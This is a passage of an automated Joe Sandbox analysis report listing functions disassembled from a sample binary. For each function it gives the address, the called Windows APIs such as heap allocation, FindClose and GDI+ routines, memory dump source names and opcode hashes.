                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                • String ID:
                                • API String ID: 806969131-0
                                • Opcode ID: 269618c7eaf2388814a30454c9b6246d9db3a3fe6fd6c3e139867d9eb3d540ff
                                • Instruction ID: ec2dee13527e13990df7c0ff5ab836e5062c19e99e18b53343e5371a1fc50c15
                                • Opcode Fuzzy Hash: 269618c7eaf2388814a30454c9b6246d9db3a3fe6fd6c3e139867d9eb3d540ff
                                • Instruction Fuzzy Hash: B9D022782043022C2C0837F02C8AAB82384DA72FB03F00B8AFB20CA0D2EF2080087331
                                Function 00D7DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • DloadLock.DELAYIMP ref: 00D7DC73
                                • DloadProtectSection.DELAYIMP ref: 00D7DC8F
                                  • Part of subcall function 00D7DE67: DloadObtainSection.DELAYIMP ref: 00D7DE77
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Dload$Section$LockObtainProtect
                                • String ID:
                                • API String ID: 731663317-0
                                • Opcode ID: 5c371756dd61ea19360e4262f28e723550e9ca28b0b042c327b15b8bfc1012d6
                                • Instruction ID: 3e7f1c1096a48527a6ee09fa5f7cf838311e7a89817a3a20b11c53a10bf22d49
                                • Opcode Fuzzy Hash: 5c371756dd61ea19360e4262f28e723550e9ca28b0b042c327b15b8bfc1012d6
                                • Instruction Fuzzy Hash: 25D0C9701003428AC312AF149A86B1C3676FF08744FA88655F29DC72A9FBA944C0C635
                                Function 00D612E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ItemShowWindow
                                • String ID:
                                • API String ID: 3351165006-0
                                • Opcode ID: 0beb751d95162973293639325686029157afed27cada079c1b4f39cd92c37783
                                • Instruction ID: 21d06b82c98fd243a6d4ee7a605a2e8d45509b3b8c4b19974c80fdec23afa32a
                                • Opcode Fuzzy Hash: 0beb751d95162973293639325686029157afed27cada079c1b4f39cd92c37783
                                • Instruction Fuzzy Hash: 51C01272058302BECB010BB0DC09D3FBBA8EBA4312F09C908B2A5C0160C638C010DB21
                                Function 00D619A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 4c202bcbade5e87aeb48ab7860daa426269c7bf7a3a9ae2d3d9475e3743a2f12
                                • Instruction ID: fe5c9e0ca5489f0039b603f1cfe99da8bdce8075588eef2059864119069cbb63
                                • Opcode Fuzzy Hash: 4c202bcbade5e87aeb48ab7860daa426269c7bf7a3a9ae2d3d9475e3743a2f12
                                • Instruction Fuzzy Hash: 4AC19E38A042549FEF15CF68C895BAD7BA5EF0A304F1C40BAEC46DB286CB319944CB71
                                Function 00D63B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: f313c7d7503d618a73ad7cfce952f63b904973046eccf3f91292536ce1184cb3
                                • Instruction ID: 2ed1e4407d0606d5a186c1b1f09ec9734c29da4312e7b90d9f498d4e51655817
                                • Opcode Fuzzy Hash: f313c7d7503d618a73ad7cfce952f63b904973046eccf3f91292536ce1184cb3
                                • Instruction Fuzzy Hash: 76719B71104B44AFDB25DB74CC51AEBB7E8EF14301F48496EE5AB47242DA32AA48CF31
                                Function 00D6837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D68384
                                  • Part of subcall function 00D61380: __EH_prolog.LIBCMT ref: 00D61385
                                  • Part of subcall function 00D61380: new.LIBCMT ref: 00D613FE
                                  • Part of subcall function 00D619A6: __EH_prolog.LIBCMT ref: 00D619AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 398bcf02b1fbc9e09eecff41bf90a88c0191843217ad091a1cd375e9d5707ff2
                                • Instruction ID: b486a27623308d5a3f2c9d95ae3f4606e1075415c57a56ed6c5bf78038689969
                                • Opcode Fuzzy Hash: 398bcf02b1fbc9e09eecff41bf90a88c0191843217ad091a1cd375e9d5707ff2
                                • Instruction Fuzzy Hash: CA4192318406589BDB20DB60CC55BEA73B9EF54300F0841EAE58AA7093DF756AC8EF70
                                Function 00D61E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D61E05
                                  • Part of subcall function 00D63B3D: __EH_prolog.LIBCMT ref: 00D63B42
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: c641fc4cdfdcaae35a014210faac14998e41ae6ef6f1076cf37a17446a103f6d
                                • Instruction ID: 23f23f6f42cf2ad187efe297977900fdcc1c4032202b419aee3f9a9f113fe8db
                                • Opcode Fuzzy Hash: c641fc4cdfdcaae35a014210faac14998e41ae6ef6f1076cf37a17446a103f6d
                                • Instruction Fuzzy Hash: D52148759041089FCB11EF99D9419EEFBF5FF58300B1441AEE849A3252DB325E14CB70
                                Function 00D7A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D7A7C8
                                  • Part of subcall function 00D61380: __EH_prolog.LIBCMT ref: 00D61385
                                  • Part of subcall function 00D61380: new.LIBCMT ref: 00D613FE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: f9178aa2ac5476f91a88ad60782aa97c44da243ef9c68b4ec862d21bb651ef81
                                • Instruction ID: 08e32d68984b7646a2baae82b111a1a950a9aecc8e12b59f97cf6463b5543aa0
                                • Opcode Fuzzy Hash: f9178aa2ac5476f91a88ad60782aa97c44da243ef9c68b4ec862d21bb651ef81
                                • Instruction Fuzzy Hash: E9216B75C04259ABCF14DF98C9429EEB7B4EF59304F0444EEE809A7202EB356E06DB71
                                Function 00D692E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 4374aee3adfd7ee97b948a539c0fd25cf132c4896cb4fd0c12f1c1c9a0a52735
                                • Instruction ID: aed58e4984e558f14855a02c308467d490c89fca8c12015dc3cb50c756c0a34e
                                • Opcode Fuzzy Hash: 4374aee3adfd7ee97b948a539c0fd25cf132c4896cb4fd0c12f1c1c9a0a52735
                                • Instruction Fuzzy Hash: F8116173E505289BCF22AFA8CC519EEF73AEF48750F054115F805B7361DA358D1186B0
                                Function 00D8BB8A Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D885A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D88FD3,00000001,00000364,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D885EA
                                • _free.LIBCMT ref: 00D8BBF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AllocateHeap_free
                                • String ID:
                                • API String ID: 614378929-0
                                • Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                                • Instruction ID: 69a550a12af0d5a1ebd9f1f4370c9cdc1894a85685c7f8dfa61af1334bef041e
                                • Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                                • Instruction Fuzzy Hash: 9C01F9732003496BE3319F69D88595AFBE9FB85370F29056EE594832C0EB30B805C774
                                Function 00D6AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                • Instruction ID: e7aa2be948ba05e0b806bb296b2148a53f8da5778b3fbdf0dea396bb006a55f0
                                • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                • Instruction Fuzzy Hash: 9CF08C305007059FDB30DEA8CA41616B7E8EB15320F248A1BE4DAE3680E770E880CB72
                                Function 00D885A9 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D88FD3,00000001,00000364,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D885EA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 10ce3ecc7b88b9b439d0651f3f402bc75164173568bab6ab99f04aeb6eadf782
                                • Instruction ID: 928918b0b205dcb04756f054980b6a5a9d2b4a5477a9d64e6a6fde9ccaa46abb
                                • Opcode Fuzzy Hash: 10ce3ecc7b88b9b439d0651f3f402bc75164173568bab6ab99f04aeb6eadf782
                                • Instruction Fuzzy Hash: 53F0E9316442226BDB317F26DC05B6B7788DF417B0B988151E818E6581CE20ED016BF4
                                Function 00D65BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D65BDC
                                  • Part of subcall function 00D6B07D: __EH_prolog.LIBCMT ref: 00D6B082
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 325719526aebfd486de5f7f903f9b4984cd94df12b1c812a0ec6bb59d334f5f1
                                • Instruction ID: 2c4dbd83aaa074f33822a04342a63e525c60f77c141b670869583b9b0aa485bd
                                • Opcode Fuzzy Hash: 325719526aebfd486de5f7f903f9b4984cd94df12b1c812a0ec6bb59d334f5f1
                                • Instruction Fuzzy Hash: B1016D34A05A94DBC725F7A4D0553DDFBA4DF19700F40859EF86A53283CBB41B08C672
                                Function 00D88518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 06f8ef48e90bf520e8a53b0c206fe5cb9987c00eb9010ff7920467e5dc39ab51
                                • Instruction ID: c8232b49d0d5c1f3dfc72431c807843d0c3ca43bb9b10fc08418296c2aafac30
                                • Opcode Fuzzy Hash: 06f8ef48e90bf520e8a53b0c206fe5cb9987c00eb9010ff7920467e5dc39ab51
                                • Instruction Fuzzy Hash: FEE0E5615402225AEB3136695C00B6E778CEF413B0F980290EC54E2181CF20DC0067F5
                                Function 00D696D0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                Download Yara Rule
                                APIs
                                • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00D6968F,?,?,?,?,00D91FA1,000000FF), ref: 00D696EB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ChangeCloseFindNotification
                                • String ID:
                                • API String ID: 2591292051-0
                                • Opcode ID: d4fd659a13ee350ec230100b643c7ac06fa6d95edbc57fcd1cab0298b1949fc8
                                • Instruction ID: 6d5e3ad7efe4f4cf3ccb276a0eeef45a40e407189d28ec4767f0450737f96953
                                • Opcode Fuzzy Hash: d4fd659a13ee350ec230100b643c7ac06fa6d95edbc57fcd1cab0298b1949fc8
                                • Instruction Fuzzy Hash: 6DF05E30556B048FDB308A64D569792B7E89B12735F088B1E90EB535A4D771A84D8B20
                                Function 00D6A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D6A4F5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                • API String ID: 1863332320-0
                                • Opcode ID: e744c8dc34558b5d7321776a42496605922ced728be0eeb715cd77d4108ba718
                                • Instruction ID: e7a58982640a4df3976ac2e3084f4080fb4ede3a11e5fb5fdb9304917c94c3d8
                                • Opcode Fuzzy Hash: e744c8dc34558b5d7321776a42496605922ced728be0eeb715cd77d4108ba718
                                • Instruction Fuzzy Hash: 41F0E931009380ABCA225B7C48047C6BB90AF06331F04CA49F1FD62195C27864D59F33
                                Function 00D7067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                Download Yara Rule
                                APIs
                                • SetThreadExecutionState.KERNEL32(00000001), ref: 00D706B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ExecutionStateThread
                                • String ID:
                                • API String ID: 2211380416-0
                                • Opcode ID: 8082e9619b4c81a36daf3d6e84036c539a06d81ca7172ed19832e7d2480c7086
                                • Instruction ID: 17a05698a5532b0791bcd5beda4bc5ef4d4ce63d87b54ff0137d45aaa60d068d
                                • Opcode Fuzzy Hash: 8082e9619b4c81a36daf3d6e84036c539a06d81ca7172ed19832e7d2480c7086
                                • Instruction Fuzzy Hash: B8D05B297181506BD6213778A8167FE1E068FC3710F0D816AB41D677C7EB474C8652F2
                                Function 00D79D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GdipAlloc.GDIPLUS(00000010), ref: 00D79D81
                                  • Part of subcall function 00D79B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D79B30
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Gdip$AllocBitmapCreateFromStream
                                • String ID:
                                • API String ID: 1915507550-0
                                • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                • Instruction ID: 9e65e4e66285976bb9157a66cc91f037b0df3507596b97c63df611b6aa89c823
                                • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
